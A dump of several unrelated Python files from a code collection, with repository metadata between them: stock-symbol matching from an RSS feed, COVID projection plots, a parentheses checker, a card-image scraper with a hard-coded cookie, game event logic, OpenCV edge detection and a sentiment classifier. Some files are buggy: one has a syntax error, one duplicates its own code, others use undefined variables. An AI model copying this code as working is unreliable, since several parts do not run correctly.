with open('cnbc.xml', 'wb') as cnbc:
cnbc.write(resp.content)
def parseXML(xmlfile):
# create element tree object
tree = ET.parse(xmlfile)
# get root element
root = tree.getroot()
candidate=""
newsitems = []
for item in root.findall('./channel/item'):
for child in item:
if child.tag == 'description':
#candidate=child.text
newsitems.append(child.text)
return newsitems
def savetoCSV(newsitems, filename):
with open(filename, 'w') as writeFile:
writer = csv.writer(writeFile)
writer.writerows(newsitems)
def findsym_nasdaq(newsitem):
with open('packer/nasdaq.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
symb="none"
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
stock=row[1].replace(",", "")
stock=stock.replace(" Corporation", "")
stock=stock.replace(" Inc.", "")
stock=stock.replace(" Ltd.", "")
stock=stock.replace(" Limited", "")
stock=stock.replace(" Corp.", "")
stock=stock.replace(" Corp", "")
stock=stock.replace(" Ltd", "")
stock=stock.replace(" Inc", "")
stock=stock.replace(" LLC", "")
stock=stock.replace(".com", "")
if(stock in newsitem):
#print(row[0])
symb=row[0]
line_count += 1
return symb
def findsym_nyse(newsitem):
with open('packer/nyse.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
symb="none"
financers=["MS", "GS", "SFB", "SF^B","CS","SF^A", "SF","C^J","C","C^S","C^K","DB","C^N","EVR"]
watch=0;
temp_symb="none"
repeat=0;
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
#stock=row[1]
stock=row[1].replace(",", "")
stock=stock.replace(" Corporation", "")
stock=stock.replace(" Inc.", "")
stock=stock.replace(" Ltd.", "")
stock=stock.replace(" Limited", "")
stock=stock.replace(" Corp.", "")
stock=stock.replace(" Corp", "")
stock=stock.replace(" Ltd", "")
stock=stock.replace(" Inc", "")
stock=stock.replace(" LLC", "")
stock=stock.replace(" LP", "")
stock=stock.replace(" Company", "")
stock=stock.replace(" Co", "")
stock=stock.replace(" &", "")
stock=stock.replace(" (The)", "")
stock=stock.replace(" Financial", "")
stock=stock.replace(" L.P.", "")
stock=stock.replace(" AG", "")
stock=stock.replace(" PLC", "")
stock=stock.replace(" Group", "")
stock=stock.replace(" Holdings", "")
stock=stock.replace(" International", "")
stock=stock.replace("Walt ", "")
stock=stock.replace("Harley-Davidson", "Harley")
#if stock
#print("\""+row[0]+"\",\""+ stock +"\"")
if stock in newsitem:
symb=row[0]
#repeat=1;
if symb not in financers:
temp_symb=symb
else:
watch=1
if watch==1:
symb=temp_symb
line_count += 1
return symb
def parser():
loadRSS()
newsitems = parseXML('cnbc.xml')
return(newsitems)
def symbolget(newsitem):
symb=findsym_nyse(newsitem)
if symb=="none":
symb=(findsym_nasdaq(newsitem))
return(symb)
| true |
796212d2cc6982dbbd48d42eaf4579942321d156 | Python | hscleandro/COVIDcases | /plot.py | UTF-8 | 3,496 | 3.140625 | 3 | [
"MIT"
] | permissive | # Calculate the number of cases with a decreasing R-number
# For information only. Provided "as-is" etc.
# Import our modules that we are using
import matplotlib.pyplot as plt
import numpy as np
import math
import matplotlib.dates as mdates
import datetime as dt
from matplotlib.font_manager import FontProperties
from datetime import datetime
# VARIABLES
# number of 'besmettelijken' on 26th of November 2020 in the Netherlands
# startdate in m/d/yyyy
numberofcasesdayzero = [331]
STARTDATE = "12/15/2020"
NUMBEROFDAYS = 90
TURNINGPOINTDAY = 5
# R-numbers. Decrease and increase in two seperate figures
Rold = 1.2
Rvalues = [[0.95, 0.9,0.85, 0.8,0.75, 0.7]]
# Some manipulation of the x-values
startx = dt.datetime.strptime(STARTDATE,'%m/%d/%Y').date()
then = startx + dt.timedelta(days=NUMBEROFDAYS)
x = mdates.drange(startx,then,dt.timedelta(days=1))
# x = dagnummer gerekend vanaf 1 januari 1970 (?)
# y = aantal gevallen
# z = dagnummer van 1 tot NUMBEROFDAYS
z = np.array(range(NUMBEROFDAYS))
k = []
date_format = "%m/%d/%Y"
a = datetime.strptime(STARTDATE, date_format)
# Here we go
for s in numberofcasesdayzero:
for Rx in Rvalues:
for R in Rx:
# nested list because first I had two graphs (one for r>1 and another one for r<1)
k.append (s)
Rnew = R
for t in range(1, NUMBEROFDAYS):
if t<TURNINGPOINTDAY :
Ry = Rold - (t/TURNINGPOINTDAY * (Rold - Rnew))
else:
Ry = Rnew
if Ry == 1:
# prevent an [divide by zero]-error
Ry = 1.000001
thalf = 4 * math.log(0.5) / math.log(Ry)
k.append( k[t-1] * (0.5**(1/thalf)))
labelx = 'Rnew = ' + str(R)
plt.plot(x,k,label =labelx)
k = []
# Add X and y Label and limits
plt.xlabel('date')
plt.xlim(x[0], x[-1])
plt.ylabel('positive tests per 100k inhabitants in 7 days')
plt.ylim(0,450)
# add horizontal lines and surfaces
plt.fill_between(x, 0, 49, color='yellow', alpha=0.3, label='waakzaam')
plt.fill_between(x, 50, 149, color='orange', alpha=0.3, label='zorgelijk')
plt.fill_between(x, 150, 249, color='red', alpha=0.3, label='ernstig')
plt.fill_between(x, 250, 499, color='purple', alpha=0.3, label='zeer ernstig')
plt.fill_between(x, 500, 600, color='grey', alpha=0.3, label='zeer zeer ernstig')
plt.axhline(y=0, color='green', alpha=.6,linestyle='--' )
plt.axhline(y=49, color='yellow', alpha=.6,linestyle='--')
plt.axhline(y=149, color='orange', alpha=.6,linestyle='--')
plt.axhline(y=249, color='red', alpha=.6,linestyle='--')
plt.axhline(y=499, color='purple', alpha=.6,linestyle='--')
plt.axvline(x=x[0]+35, color='purple', alpha=.6,linestyle='--',label = "19/01/2021")
# Add a grid
plt.grid(alpha=.4,linestyle='--')
#Add a Legend
fontP = FontProperties()
fontP.set_size('xx-small')
plt.legend( loc='upper right', prop=fontP)
# Add a title
titlex = (
'Pos. tests per 100k inhabitants in 7 days.\n'
'Number of cases on '+ str(STARTDATE) + ' = ' + str(numberofcasesdayzero) + '\n'
'Rold = ' + str(Rold) +
' // Rnew reached in ' + str(TURNINGPOINTDAY) + ' days (linear decrease)' )
plt.title(titlex , fontsize=10)
# lay-out of the x axis
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=5))
plt.gcf().autofmt_xdate()
# Show the plot
plt.show()
| true |
22c6d978cd00b7a11c310d5709b9334ba7fc11b5 | Python | garam-park/elice-algorithm1-2018 | /ch01_recursive/ex03.py | UTF-8 | 583 | 3.5 | 4 | [] | no_license | '''
올바른 괄호인지 판단하기
https://academy.elice.io/courses/339/lectures/2416/materials/5
'''
def checkParen(p):
if len(p) == 0:
return "YES"
if len(p) == 2:
if p == "()":
return "YES"
else:
return "NO"
for i in range(0,len(p)-1):
if p[i] == "(" and p[i+1] == ')'
tmp = p[:i] + p[i+2:]
return checkParen(tmp)
return "NO"
def main():
'''
Do not change this code
'''
x = input()
print(checkParen(x))
if __name__ == "__main__":
main()
| true |
050b4c3261ab1c0391097d4441f142720fcbf2b4 | Python | profran/YGOCardDownloader | /DownloadMain.ydk.py | UTF-8 | 4,348 | 2.59375 | 3 | [] | no_license | #!/usr/bin/env python
import requests
import os
clear = lambda: os.system('cls')
def newDeckPrint():
clear()
print("Welcome to Yu-Gi-Oh PDF printable cards!\n")
dir = os.getcwd()
deckArray = []
for file in os.listdir(dir):
if (file.endswith(".ydk")):
deckArray.append(file)
print("Wich deck do you want to download?: \n")
for deck, x in zip(deckArray, range(0, len(deckArray))):
print("-->({0}): ".format(x) + deck)
while (True):
selectedDeck = int(input("--> "))
if (selectedDeck > len(deckArray)):
pass
else:
break
clear()
print("Now downloading " + str(deckArray[selectedDeck])[:-4] + "... \n")
downloadImages(str(deckArray[selectedDeck]))
def resizeImage(infile, output_dir="", size=(1024,768)):
outfile = os.path.splitext(infile)[0]+"_resized"
extension = os.path.splitext(infile)[1]
if (cmp(extension, ".jpg")):
return
if infile != outfile:
try :
im = Image.open(infile)
im.thumbnail(size, Image.ANTIALIAS)
im.save(output_dir+outfile+extension,"JPEG")
except IOError:
print("cannot reduce image for ", infile)
def downloadImages(deckName):
urls = []
lines = []
directory = os.getcwd()
with open(deckName) as f:
for line in f:
if ('#' not in line and '!' not in line):
urls.append("https://www.ygoprodeck.com/pics/" + line + ".jpg")
lines.append(line[:-2])
totalDownloads = len(urls)
for x, y in zip(urls, range(0, (totalDownloads))):
while (True):
print("Downloading card " + str(y) + " out of " + str(totalDownloads))
r = requests.get(x, allow_redirects=False)
headers = {"authority" : "www.ygoprodeck.com",
"method" : "GET",
"path" : str(lines[y]),
"scheme" : "https",
"accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding" : "gzip, deflate, br",
"accept-language" : "en-US,es-AR;q=0.8,es;q=0.6,en;q=0.4",
"cache-control" : "max-age=0",
"cookie" : "__cfduid=d44a7d84ccf5584239828478ed1850abf1508689423; _ga=GA1.2.324886416.1508689429; _gid=GA1.2.1979240285.1508689429",
"upgrade-insecure-requests" : "1",
"user-agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"}
r = requests.get(x, headers=headers)
print(r.status_code)
if(r.status_code == requests.codes.ok):
filename = str(y) + ".jpg"
cardDirectory = os.path.join(str(directory), str(deckName[:-4]))
if not os.path.exists(cardDirectory):
os.makedirs(cardDirectory)
with (open(os.path.join(cardDirectory, filename), 'ab')) as fh:
fh.write(r.content)
break
downloadImage(urls, deckName)
def downloadImage(urls, deckName):
print("Do you need to re-download a card?")
while(True):
election = input("Card number: ")
if (str(election) == ""):
break
else:
directory = os.getcwd()
totalDownloads = len(urls)
print("Downloading card " + str(election))
r = requests.get(x, allow_redirects=False)
headers = {"authority" : "www.ygoprodeck.com",
"method" : "GET",
"path" : str(lines[y]),
"scheme" : "https",
"accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding" : "gzip, deflate, br",
"accept-language" : "en-US,es-AR;q=0.8,es;q=0.6,en;q=0.4",
"cache-control" : "max-age=0",
"cookie" : "__cfduid=d44a7d84ccf5584239828478ed1850abf1508689423; _ga=GA1.2.324886416.1508689429; _gid=GA1.2.1979240285.1508689429",
"upgrade-insecure-requests" : "1",
"user-agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"}
r = requests.get(x, headers=headers)
filename = "re-download-" + str(election) + ".jpg"
cardDirectory = os.path.join(str(directory), str(deckName[:-4]))
if not os.path.exists(cardDirectory):
os.makedirs(cardDirectory)
with (open(os.path.join(cardDirectory, filename), 'ab')) as fh:
fh.write(r.content)
if __name__ == '__main__':
newDeckPrint()
'''
if __name__=="__main__":
output_dir = "resized"
dir = os.getcwd()
if not os.path.exists(os.path.join(dir,output_dir)):
os.mkdir(output_dir)
for file in os.listdir(dir):
resizeImage(file,output_dir)
''' | true |
9fefadd175f597f77f515d933e8e9ea09091a833 | Python | figueiredo-alef/estudo-python | /exemplos/ex006.py | UTF-8 | 206 | 3.78125 | 4 | [
"MIT"
] | permissive | print('=' * 5, 'EX_006', '=' * 5)
n1 = int(input('Digite um número: '))
d = n1 * 2
t = n1 * 3
r = n1 ** (1/2)
print('O dobro de {0} é {1}, o triplo é {2} e a raiz quadradda é {3}.'.format(n1, d, t, r))
| true |
a8a9739fafabbabeba3626b5c3ea8bae38188f24 | Python | daxingyou/test-2 | /app/business/question.py | UTF-8 | 3,560 | 2.53125 | 3 | [] | no_license | #coding:utf8
"""
Created on 2015-12-23
@Author: jiangtaoran(jiangtaoran@ice-time.cn)
@Brief : 问答随机事件逻辑
"""
from utils import logger
from utils import utils
from datalib.data_loader import data_loader
from app.data.node import NodeInfo
from app.business import hero as hero_business
from app.business import item as item_business
from app import log_formater
def arise_question_event(data, node, now, **kwargs):
"""出现问答事件
"""
if not node.arise_event(NodeInfo.EVENT_TYPE_QUESTION, now):
return False
map = data.map.get()
map.update_for_question_event()
return True
def clear_question_event(data, node, now, **kwargs):
"""清除探访事件
"""
#节点上必须有合法的探访随机事件
if node.event_type != NodeInfo.EVENT_TYPE_QUESTION:
logger.warning("Wrong event[type=%d]" % node.event_type)
return False
question = data.question.get()
question.finish()
return node.clear_event()
def start_question_event(data, node, now):
"""启动问答事件
Returns:
True/False
"""
#节点上必须有合法的问答随机事件
if node.event_type != NodeInfo.EVENT_TYPE_QUESTION:
logger.warning("Wrong event[type=%d]" % node.event_type)
return False
if not node.launch_event(now):
return False
question = data.question.get()
question.start(node, now)
return True
def finish_question_event(data, node, question_id, answer, correct, now):
"""结束问答事件
Args:
data
node[NodeInfo]: 节点信息
question_id[int]: 问题 id
answer[list(int)]: 回答
correct[bool]: 回答是否正确
now[int]: 当前时间戳
Returns:
True/False
"""
#节点上必须有合法的问答随机事件
if node.event_type != NodeInfo.EVENT_TYPE_QUESTION:
logger.warning("Wrong event[type=%d]" % node.event_type)
return False
if not node.is_event_launched():
logger.warning("Lucky event not launched")
return False
#结束问答流程
question = data.question.get()
if correct != question.answer(question_id, answer):
logger.warning("Answer check error")
return False
question.finish()
if correct:
#如果回答正确,用户获得收益(英雄、物品)
hero_basic_id = data_loader.EventQuestionBasicInfo_dict[question_id].heroBasicId
items_basic_id = data_loader.EventQuestionBasicInfo_dict[question_id].itemBasicId
items_num = data_loader.EventQuestionBasicInfo_dict[question_id].itemNum
assert len(items_basic_id) == len(items_num)
item_info = []
for i in range(0, len(items_basic_id)):
item_info.append((items_basic_id[i], items_num[i]))
if hero_basic_id != 0 and not hero_business.gain_hero(data, hero_basic_id):
return False
if len(item_info) > 0 and not item_business.gain_item(data, item_info, " question reward", log_formater.QUESTION_REWARD):
return False
#如果回答正确,获得功勋值
user = data.user.get(True)
resource = data.resource.get()
resource.update_current_resource(now)
ac_base = data_loader.LuckyEventBasicInfo_dict[node.event_type].achievementBase
ac_coe = data_loader.LuckyEventBasicInfo_dict[node.event_type].achievementCoefficient
achievement = ac_base + ac_coe * user.level
resource.gain_achievement(achievement)
return node.finish_event(now)
| true |
7498c8229e0295a2dfc24adf95b6eea29c1884c1 | Python | mamerisawesome/oneeighty_container | /180_1.py | UTF-8 | 3,994 | 3.28125 | 3 | [] | no_license | import time
import random as rand
final_sum = 0
def get_random_int ():
return rand.randint(0, 10 ** 6)
def generate_matrix (n):
output = []
for i in range (0, n):
ioutput = []
for j in range(0, n):
ioutput += [get_random_int()]
output += [ioutput]
return output
def v_func (matrix, y):
x = len(matrix)
output = []
sum_v = 0
for i in range(0, x):
if (i < x): break
sum_v += matrix[i][y]
return sum_v
def column_sum (matrix, m, n):
output = []
for i in range(0, n):
output += [v_func(matrix, i)]
return output
def break_matrix (matrix, t):
'''
n x n
[
...
]
4 x 4
2 thread
4 x (4 / 2)
4 x (4 x 4)
[
[1, 2, 3, 1],
[4, 5, 6, 1],
[7, 8, 9, 1],
[5, 4, 6, 1]
]
4 x 2
[
[1, 2],
[4, 5],
[7, 8],
[5, 4]
]
[
[3, 1],
[6, 1],
[9, 1],
[6, 1]
]
'''
final_sum = 0
def get_random_int ():
return rand.randint(0, 10 ** 6)
def generate_matrix (n):
output = []
for i in range (0, n):
ioutput = []
for j in range(0, n):
ioutput += [get_random_int()]
output += [ioutput]
return output
def v_func (matrix, y):
x = len(matrix)
output = []
sum_v = 0
for i in range(0, x):
if (i < x): break
sum_v += matrix[i][y]
return sum_v
def column_sum (matrix, m, n):
output = []
for i in range(0, n):
output += [v_func(matrix, i)]
return output
def break_matrix (matrix, t):
'''
n x n
[
...
]
4 x 4
2 thread
4 x (4 / 2)
4 x (4 x 4)
[
[1, 2, 3, 1],
[4, 5, 6, 1],
[7, 8, 9, 1],
[5, 4, 6, 1]
]
4 x 2
[
[1, 2],
[4, 5],
[7, 8],
[5, 4]
]
[
[3, 1],
[6, 1],
[9, 1],
[6, 1]
]
'''
output = []
mat_div = len(matrix) / t
if (len(matrix) % t == 0):
print('[WARN]\tCannot subdivide matrix')
return [matrix]
for x in range(0, len(matrix), mat_div):
xoutput += []
for i in range(0, len(matrix)):
ioutput = []
for j in range(x, x + mat_div):
ioutput += [matrix[j][i]]
xoutput += [ioutput]
output += xoutput
return output
def lab01 ():
n = int(raw_input("Enter size of square matrix\t\t>> "))
matrix = generate_matrix(n)
for i in range(0, len(matrix)):
for j in range(0, len(matrix)):
print '[*]' + str(matrix[j][i])
s_time = time.clock()
column_sum(matrix, n, n)
e_time = time.clock()
return e_time - s_time
def lab02 ():
n = int(raw_input("Enter size of square matrix\t\t>> "))
t = int(raw_input("Enter number of threads to be used\t>> "))
v = []
matrix = generate_matrix(n)
s_time = time.clock()
# insert column_sum logic here
e_time = time.clock()
return
def lab01 ():
n = int(raw_input("Enter size of square matrix\t\t>> "))
matrix = generate_matrix(n)
for i in range(0, len(matrix)):
for j in range(0, len(matrix)):
print '[*]' + str(matrix[j][i])
s_time = time.clock()
column_sum(matrix, n, n)
e_time = time.clock()
return e_time - s_time
def lab02 ():
n = int(raw_input("Enter size of square matrix\t\t>> "))
t = int(raw_input("Enter number of threads to be used\t>> "))
v = []
matrix = generate_matrix(n)
s_time = time.clock()
# insert column_sum logic here
e_time = time.clock()
return
print lab01()
print lab02()
| true |
005775540241583013415c99410713b5d7c9ccce | Python | taowenyin/HelloCV | /opencv_example/S5/S5.1.py | UTF-8 | 1,422 | 3.140625 | 3 | [] | no_license | import cv2
import numpy as np
import matplotlib.pyplot as plt
# 边缘检测
if __name__ == '__main__':
rows = 2
columns = 3
lena = cv2.imread('data/Lena.png')
plt.subplot(rows, columns, 1)
plt.title('Lena')
plt.imshow(cv2.cvtColor(lena.copy(), cv2.COLOR_BGR2RGB))
# 第一步:把图像转化为灰度图像
lean_gray = cv2.cvtColor(lena, cv2.COLOR_BGR2GRAY)
plt.subplot(rows, columns, 2)
plt.title('Lena-Gray')
plt.imshow(cv2.cvtColor(lean_gray.copy(), cv2.COLOR_BGR2RGB))
# 第二步:对图像进行降噪
lean_blur = cv2.blur(lean_gray, (3, 3))
plt.subplot(rows, columns, 3)
plt.title('Lena-Blur')
plt.imshow(cv2.cvtColor(lean_blur.copy(), cv2.COLOR_BGR2RGB))
# 第三步:通过设置梯度大小和滞后阈值进行边缘检测
lean_canny = cv2.Canny(lean_blur, 30, 80, apertureSize=3)
plt.subplot(rows, columns, 4)
plt.title('Lena-Canny')
plt.imshow(cv2.cvtColor(lean_canny.copy(), cv2.COLOR_BGR2RGB))
# 第四步:掩模取反
canny_mask = cv2.bitwise_not(lean_canny.copy())
plt.subplot(rows, columns, 5)
plt.title('Lena-Mask')
plt.imshow(cv2.cvtColor(canny_mask.copy(), cv2.COLOR_BGR2RGB))
# 第五步:获取边框
dst = cv2.copyTo(lena, canny_mask)
plt.subplot(rows, columns, 6)
plt.title('Lena-Dst')
plt.imshow(cv2.cvtColor(dst.copy(), cv2.COLOR_BGR2RGB))
plt.show() | true |
56fe9d264fa3f34fd376747407d112656420bf68 | Python | huytr225/workload | /poisson/poisson.py | UTF-8 | 404 | 2.515625 | 3 | [] | no_license | import statsmodels.api as sm
import statsmodels.formula.api as smf
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
dataset = sm.datasets.get_rdataset("discoveries")
df = dataset.data.set_index("time")
df.head(10).T
fig, ax = plt.subplots(1, 1, figsize=(16, 4))
df.plot(kind='bar', ax=ax)
model = smf.poisson("discoveries ~ 1", data=df)
result = model.fit()
print(result.summary())
| true |
daada6e38258b9d6b9f4ecf91a30794bf27cc735 | Python | alexBDG/QuidEst | /Displayers/ImagePlayer.py | UTF-8 | 3,760 | 2.5625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 9 11:15:47 2020
@author: Alexandre Banon
"""
import sys
from PIL.ImageQt import ImageQt
from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog, QGraphicsScene
from PyQt5.QtWidgets import QToolButton, QVBoxLayout, QGraphicsView, QStatusBar
from PyQt5.QtCore import Qt, QDir
from PyQt5.QtGui import QPixmap, QFont
class ImagePlayer(QWidget):
def __init__(self, img_path, parent=None):
super(ImagePlayer, self).__init__(parent)
if __name__ == '__main__':
self.setWindowTitle("Viewer")
self.setGeometry(0, 0, 640, 480)
self.main = QWidget()
else:
self.setGeometry(0, 0, parent.width(), parent.height())
self.main = parent
self.vue = QGraphicsView()
self.vue.setDragMode(QGraphicsView.ScrollHandDrag)
self.vue.wheelEvent = self.wheel_event
self.statusBar = QStatusBar()
self.statusBar.setFont(QFont("Noto Sans", 7))
self.statusBar.setFixedHeight(14)
self.verticalLayout = QVBoxLayout()
self.verticalLayout.addWidget(self.vue)
self.verticalLayout.addWidget(self.statusBar)
self.setPixmapView(img_path)
self.statusBar.showMessage(img_path)
if __name__ == '__main__':
self.image_btn = QToolButton()
self.image_btn.setText("Image")
self.image_btn.setObjectName("image_btn")
self.image_btn.clicked.connect(self.get_image)
self.verticalLayout.addWidget(self.image_btn)
self.setLayout(self.verticalLayout)
self.show()
else:
self.main.setLayout(self.verticalLayout)
def get_image(self):
img, _p = QFileDialog.getOpenFileName(self,
"Ouvrir un fichier",
QDir.homePath(),
"All Files *.* ;; PNG *.png ;; JPG *.jpg ;; BMP *.bmp")
if not img:
with open("img.txt","w") as file:
file.write("not img")
return
self.setPixmapView(img)
def setPixmapView(self, img_path):
self.current_image = ImageQt(img_path)
w, h = self.size().width(), self.size().height()
self.pixmap = QPixmap.fromImage(self.current_image.scaled(w, h,
Qt.KeepAspectRatio,
Qt.FastTransformation))
self.view_current()
self.statusBar.showMessage(img_path)
def view_current(self):
w_pix, h_pix = self.pixmap.width(), self.pixmap.height()
self.scene = QGraphicsScene()
self.scene.setSceneRect(0, 0, w_pix, h_pix)
self.scene.addPixmap(self.pixmap)
self.vue.setScene(self.scene)
def wheel_event(self, event):
steps = event.angleDelta().y() / 120.0
self.zoom(steps)
event.accept()
def zoom(self, step):
w_pix, h_pix = self.pixmap.width(), self.pixmap.height()
w, h = w_pix * (1 + 0.1*step), h_pix * (1 + 0.1*step)
self.pixmap = QPixmap.fromImage(self.current_image.scaled(w, h,
Qt.KeepAspectRatio,
Qt.FastTransformation))
self.view_current()
if __name__ == "__main__":
app = QApplication(sys.argv)
viewer = ImagePlayer("..\\ressources\\DSC_0506.JPG")
sys.exit(app.exec_()) | true |
d9c540f3e3c710cb31cf607f44392e02adbd0fcd | Python | tigerpk86/python_data__visual | /test.py | UTF-8 | 245 | 3.34375 | 3 | [] | no_license | #!__*__coding:utf-8__*__
import decimal
for i in range(1,10) :
for j in range(1,10) :
#print(i, "x", j, "=", i*j, end = ". ");
print("%2d x%2d =%2d" % (j, i, i * j), end=", ");
#print(i * j, end=" ");
print("");
| true |
98d0513e7f246939db810c06dd82858fa3bbe0df | Python | TeodorStefanPintea/Sentiment-mining-of-the-bioinformatics-literature | /trainedClassifier.py | UTF-8 | 1,272 | 3.015625 | 3 | [] | no_license | '''
This is a classifier which was trained on a movie review data set and applied in the bioinformatics domain.
'''
import pandas as pd
import random
from nltk import word_tokenize
from nltk.sentiment.util import mark_negation
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.base import TransformerMixin
data = pd.read_csv("labeledTrainData.tsv", header=0, delimiter="\t", quoting=3)
# 25000 movie reviews in data
sentiment_data = list(zip(data["review"], data["sentiment"]))
random.shuffle(sentiment_data)
# 80% for training
train_X, train_y = zip(*sentiment_data[:20000])
# Keep 20% for testing
test_X, test_y = zip(*sentiment_data[20000:])
unigram_bigram_clf = Pipeline([
('vectorizer', CountVectorizer(analyzer="word",
ngram_range=(1, 2),
tokenizer=word_tokenize,
# tokenizer=lambda text: mark_negation(word_tokenize(text)),
preprocessor=lambda text: text.replace("<br />", " "),)),
('classifier', LinearSVC())
])
#unigram_bigram_clf.fit(train_X, train_y)
#print(unigram_bigram_clf.score(test_X, test_y))
| true |
5a8f0bbfed486bd36daab5f8e5e93d4159930c15 | Python | jmv74211/Redes_neuronales | /src/plot_result.py | UTF-8 | 1,132 | 2.53125 | 3 | [] | no_license | import numpy as np
from matplotlib import pyplot as plt
num_epocs = 30
#file='./results/multilayer_perceptron/multilayer_perceptron_' + repr(num_epocs) + 'e.txt'
file='./results/multilayer_perceptron/training/tanh/multilayer_perceptron_128n_30e_f_tanh.txt'
epocas = np.loadtxt(file, delimiter='\t', skiprows=0,usecols=[0])
loss= np.loadtxt(file, delimiter='\t', skiprows=0,usecols=[1])
acc= np.loadtxt(file, delimiter='\t', skiprows=0,usecols=[2])
plt.figure()
plt.plot(epocas,acc)
plt.title("Variación de acc respecto a épocas")
plt.xlabel("Acc")
plt.ylabel("Número de épocas")
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.savefig('./results/multilayer_perceptron/training/multilayer_perceptron_' + repr(num_epocs) + 'e_acc.png')
plt.figure()
plt.plot(epocas,loss)
plt.title("Variación de loss respecto a épocas")
plt.xlabel("Loss")
plt.ylabel("Número de épocas")
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.savefig('./results/multilayer_perceptron/training/multilayer_perceptron_' + repr(num_epocs) + 'e_loss.png')
| true |
0d6952fa9b97772f3b598b744ed9f2e82ee31a38 | Python | douglasrodriguess/basic-to-advanced-python-course | /13-reading-and-writing-in-files/code/VideoLesson92_filesmode.py | UTF-8 | 1,720 | 4.09375 | 4 | [] | no_license | """
Modos de abertura de arquivo
'x' -> abre para escrita somente se o arquivo não existir. Caso exista, retorna um FileExistsError
'a' -> o conteudo é adicionado sempre no final do arquivo
'+' -> abre para a atualização, seja de leitura ou escrita
'r+' ou 'w+' -> há o controle do cursor
link: https://docs.python.org/3/library/functions.html#open
"""
print("\n - Modo de abertura 'w'")
with open('frutas.txt', 'w') as file:
try:
while True:
frutas = input("Digite uma fruta ou a palavra 'sair': ")
if frutas != 'sair':
file.write(frutas + '\n')
else:
break
except TypeError:
print("A funcao recebe apenas string como parametro")
with open('frutas.txt') as file:
print(file.read())
file.close()
print("\n - Modo de abertura 'a'")
with open('frutas.txt', 'a') as file:
try:
while True:
frutas = input("Digite uma fruta ou a palavra 'sair': ")
if frutas != 'sair':
file.write(frutas + '\n')
else:
break
except TypeError:
print("A funcao recebe apenas string como parametro")
with open('frutas.txt') as file:
print(file.read())
file.close()
print("\n - Modo de abertura 'r+'")
with open('frutas.txt', 'r+') as file:
try:
while True:
file.seek(24)
frutas = input("Digite uma fruta ou a palavra 'sair': ")
if frutas != 'sair':
file.write(frutas + '\n')
else:
break
except TypeError:
print("A funcao recebe apenas string como parametro")
with open('frutas.txt') as file:
print(file.read())
file.close()
| true |
5ff98e837692803c28bb3f6b39dd6fc542c856e0 | Python | JakeOh/201908_itw_bdml11 | /lab-python/lec01/ex09.py | UTF-8 | 1,025 | 4.375 | 4 | [] | no_license | """
dict: key-value의 쌍으로 이루어진 데이터들을 저장하는
사전(dictionary)식 데이터 타입
"""
person = {'name': '오쌤', 'age': 16, 'height': 170.5}
print(person)
print(type(person))
# dict의 데이터 참조 - key를 사용
print(person['name'])
print(person['age'])
print(person.keys()) # dict의 key를 알아낼 때
print(person.values()) # dict의 value들만 알아낼 때
print(person.items()) # (key, value)를 알아낼 때
students = {1: '강다혜', 2: '김수인', 3: '김영광', 10: '안도연'}
print(students[1])
# dict에 값을 추가
students[4] = '김재성'
print(students)
# dict의 값을 변경
students[4] = 'gildong'
print(students)
# dict의 값을 삭제 - pop(key) 메소드 사용
students.pop(4)
print(students)
book = {
'title': '파이썬 프로그래밍 교과서',
'authors': ['제니퍼', '폴', '제이슨'],
'company': '길벗',
'isbn': 97911
}
print(book['authors'])
print(book['authors'][0])
| true |
251b8f31ba431212762be5e149888d1f88f55257 | Python | f-fathurrahman/ffr-MetodeNumerik | /matplotlib01/matplotlib/ex_plot_sin_01.py | UTF-8 | 453 | 2.984375 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0.0, 1.0, 200)
Δt = 0.1
A = 1.0
λ = 0.5
f = 2.0
k = -2*np.pi/λ
ω = 2*np.pi*f
t0 = 0.0
fig, ax = plt.subplots()
# ax and fig will be reused
for i in range(20):
t = t0 + Δt*i
y = A*np.sin(k*x - ω*t)
# First plot
ax.cla()
ax.plot(x, y)
ax.grid(True)
ax.set_xlim(0.0, 1.0)
ax.set_xlabel("x")
fig.savefig("IMG_sin_" + str(i) + ".png", dpi=150)
| true |
e833e69c106f07c9af27615658d0dc0145fbc37d | Python | hatan4ik/python-3-keys-study | /solutions/person.py | UTF-8 | 255 | 3.421875 | 3 | [] | no_license | class Person:
def __init__(self, first, last):
self.first = first
self.last = last
def full_name(self):
return self.first + " " + self.last
def formal_name(self, title):
return title + " " + self.full_name()
| true |
f5fea182f379b2675d938bdf6140a6eab8e4f8f9 | Python | wunengguang/cp-cnn-mutilabel | /PT.py | UTF-8 | 4,571 | 2.515625 | 3 | [] | no_license | import numpy as np
import copy
import os
from conformpredict import MLCP
class TPMLCP(MLCP):
def __init__(self,numInstance,path,numclasses=14,count=0,anum=0):
'''
:param numInstance: number
:param numclasses:类别
'''
MLCP.__init__(self,numInstance,path,numclasses=14,count=0,anum=0)
def conformist(self,test_y,regression,r):
'''
计算每一个的奇异值
:param regression:是个数据 list
:return a: list 表示的是奇异值
'''
a =copy.deepcopy(regression)
a1socre=[]
a0socre=[]
for j in range(self.numclasses):
a1=[]
a0=[]
for i in range(len(regression[0])):
if test_y[j][i]==1:
if regression[j][i]>0.5:
a[j][i] = 1 / (regression[j][i]+r[j])
a1.append(a[j][i])
else:
a[j][i] = 1 / (1 - regression[j][i]+r[j])
a1.append(a[j][i])
else:
